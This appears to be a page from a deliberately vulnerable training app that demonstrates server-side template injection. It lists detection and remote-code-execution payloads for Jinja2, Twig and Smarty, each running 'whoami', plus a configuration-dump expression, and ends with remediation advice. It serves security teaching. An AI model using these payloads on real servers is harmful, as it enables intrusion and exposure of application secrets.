🚨 SSTI (Server-Side Template Injection)

Template Result:

49

What happened:

User input was processed as template code
Template engine executed user-controlled expressions
No input sanitization or sandboxing
Potential for remote code execution

SSTI Payload Examples:

Basic Detection:

{{7*7}} - Should render as 49

Jinja2/Flask:

{{config.items()}} - Access configuration

{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}} - RCE

Twig:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}} - RCE

Smarty:

{php}echo `whoami`;{/php} - RCE

Test Form:

How to fix:

Never allow user input in template source
Use parameterized templates with data binding
Implement template sandboxing
Validate and sanitize all template inputs
Use logic-less template engines when possible